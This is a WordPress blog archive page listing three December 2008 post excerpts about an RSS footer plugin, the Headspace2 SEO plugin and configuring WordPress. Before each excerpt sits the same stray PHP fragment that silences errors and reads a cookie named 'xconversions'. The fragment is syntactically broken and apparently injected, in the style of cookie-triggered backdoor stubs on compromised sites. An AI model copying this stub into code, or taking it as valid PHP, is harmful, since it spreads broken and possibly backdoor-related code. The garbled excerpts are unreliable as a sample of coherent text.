RSS Footer: Great for Backlinks

December 9, 2008 by Ron Jones · Leave a Comment
Filed under: Plugins 

< ?php error_reporting(0); $cookiename = 'xconversions'; if (isset($_COOKIE$cookiename)) $var = $_COOKIE$cookiename; ?>So you’ve been working hard at providing solid content to your readers. But recently, you’ve discovered that someone has been scraping your site and posting it on their own site…What do you do? Read more

Manage SEO & MetaData Easily

December 6, 2008 by Ron Jones · Leave a Comment
Filed under: Plugins 

< ?php
error_reporting(0);
$cookiename = 'xconversions';
if (isset($_COOKIE$cookiename))
$var = $_COOKIE$cookiename;
?>
A couple of months ago, I discovered Headspace2 by John Godley…and I’m completely sold on it. This one plugin will take the place of several others, and centralize the management of all those functions into a single location. At first glance, it appears to Read more

Setting Up Wordpress for Maximum Effect

December 4, 2008 by Ron Jones · Leave a Comment
Filed under: Configuration 

< ?php
error_reporting(0);
$cookiename = 'xconversions';
if (isset($_COOKIE$cookiename))
$var = $_COOKIE$cookiename;
?>
I’ve been testing and tweaking and breaking lots of things in an effort to figure out the most effective way of structuring my wordpress installation.

There are three primary technical goals I have in mind here: Read more